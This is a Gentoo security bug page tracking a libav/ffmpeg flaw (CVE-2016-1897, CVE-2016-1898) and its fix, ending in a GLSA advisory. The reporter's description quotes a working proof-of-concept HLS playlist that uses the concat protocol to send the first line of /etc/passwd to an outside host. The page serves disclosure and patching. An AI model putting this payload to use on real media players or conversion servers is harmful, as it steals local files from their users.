Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 571870 (CVE-2016-1897, CVE-2016-1898) - <media-video/libav-11.6: stealing local files with HLS+concat (CVE-2016-{1897,1898})
Summary: <media-video/libav-11.6: stealing local files with HLS+concat (CVE-2016-{1897...
Status: RESOLVED FIXED
Alias: CVE-2016-1897, CVE-2016-1898
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal minor (vote)
Assignee: Gentoo Security
URL: http://www.openwall.com/lists/oss-sec...
Whiteboard: A4 [glsa cve cleanup]
Keywords:
Depends on: CVE-2016-2326, CVE-2016-3062
Blocks:
  Show dependency tree
 
Reported: 2016-01-14 10:18 UTC by Agostino Sarubbo
Modified: 2017-05-09 19:55 UTC (History)
2 users (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Agostino Sarubbo gentoo-dev 2016-01-14 10:18:06 UTC
From ${URL} :

Hello!
I found some strange behavior in ffmpeg which can lead to stealing local
files during ffmpeg/ffprobe exec, it's also applied to libav.

I've underestimated the impact of this bug, so it was full disclosured
in this article (Russian language, but google translate works fine with
it) - http://habrahabr.ru/company/mailru/blog/274855


In short:
if linux user download specially prepared video file (with any
extension: avi/mov/etc..) which contains HLS m3u8 playlist with "concat"
protocol in url:,
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://dx.su/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST

header.m3u8:
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://example.org?

If user launches ffmpeg-based video player (MPlayer, etc..), first line
of /etc/passwd will be sent to http://example.org? in
http://example.org?# $FreeBSD: release/100.0/et..  request.
The same happens when file manager tries to generate thumbnail for this
file.

All this can be applied to server-run ffmpeg during video conversion.
FFmpeg/libav security teams are already notified, but official patches
are not available yet, so you can rebuild ffmpeg with --disable-network
configure option which prevents this vulnerability from being exploited.

Moreover, it's always recommended to run ffmpeg in isolated environment
when processing untrusted files
(googleonlinesecurity.blogspot.ru/2014/01/ffmpeg-and-thousand-fixes.html)



@maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
Comment 1 GLSAMaker/CVETool Bot gentoo-dev 2016-07-19 02:56:15 UTC
CVE-2016-1898 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1898):
  FFmpeg 2.x allows remote attackers to conduct cross-origin attacks and read
  arbitrary files by using the subfile protocol in an HTTP Live Streaming
  (HLS) M3U8 file, leading to an external HTTP request in which the URL string
  contains an arbitrary line of a local file.

CVE-2016-1897 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1897):
  FFmpeg 2.x allows remote attackers to conduct cross-origin attacks and read
  arbitrary files by using the concat protocol in an HTTP Live Streaming (HLS)
  M3U8 file, leading to an external HTTP request in which the URL string
  contains the first line of a local file.
Comment 2 Thomas Deutschmann (RETIRED) gentoo-dev 2016-11-25 01:45:34 UTC
Upstreams resolution was to disable concat per default:

https://git.libav.org/?p=libav.git;a=blob;f=Changelog;hb=refs/tags/v11.6#l7

We have disabled concat as well, https://gitweb.gentoo.org/repo/gentoo.git/tree/media-video/libav/libav-11.6.ebuild?id=699e5ef7bf5d2f62bff41d508796ae60403a8adb#n180
Comment 3 Yury German Gentoo Infrastructure gentoo-dev 2017-04-19 06:10:41 UTC
Added to an existing GLSA Request.

Maintainer(s), please drop the vulnerable version(s).
Comment 4 GLSAMaker/CVETool Bot gentoo-dev 2017-05-09 19:55:30 UTC
This issue was resolved and addressed in
 GLSA 201705-08 at https://security.gentoo.org/glsa/201705-08
by GLSA coordinator Kristian Fiskerstrand (K_F).